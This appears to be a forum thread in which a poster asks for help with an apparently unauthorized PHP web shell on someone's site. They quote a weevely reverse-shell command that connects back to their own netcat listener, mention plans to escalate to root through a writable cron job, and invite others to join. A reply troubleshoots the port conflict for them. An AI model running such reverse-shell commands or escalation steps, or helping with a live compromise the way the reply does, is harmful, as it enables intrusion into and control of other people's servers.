Hi everyone!

I was just wondering if anyone can let me know what I am doing wrong.... I recently got a php shell on a site and when i try to access the network setting for back connect it redirect to to insecure connection and doesn't let me access anything on the shell.... So I decided to use weevely. I am behind a router but I use a vpn to portforward..... I know my ports are open cause when I set netcat to listen to port that are forwarded on vpn and go to canyouseeme it says my ports are open.....so than i leave netcat on listen and try to do a reverse connection with weevley backdoor_reversetcp -shell /bin/sh -vector netcat ip port

and than i get [!][tcpserver] Error binding socket: '[Errno 98] Address already in use' ...I have also tried to get a bind shell but the server doesn't allow me to open or bind that port

Hello.

I might be wrong, but it sounds like you're trying to bind two netcats to the same port, the one you set to listen and the one you're trying to use with the weevley command.

thank you for the response I tried to issue the command without setting netcat to listen and nothing happenned : / im kind of frustrated... lol i can only get weevely shell to work on this sever ever other shell i use gives me a i think its a 500 error unsecure connection... i wish i new php so i can write my own shell lol... safe mode is off tho and i have most php commands available... Also I know I can easily escalate privilege on this server everything is running as root and i found i think a cron job that has write privileges....if anyone is willing to take a look with me I don't mind I would just like to learn more if possible :)
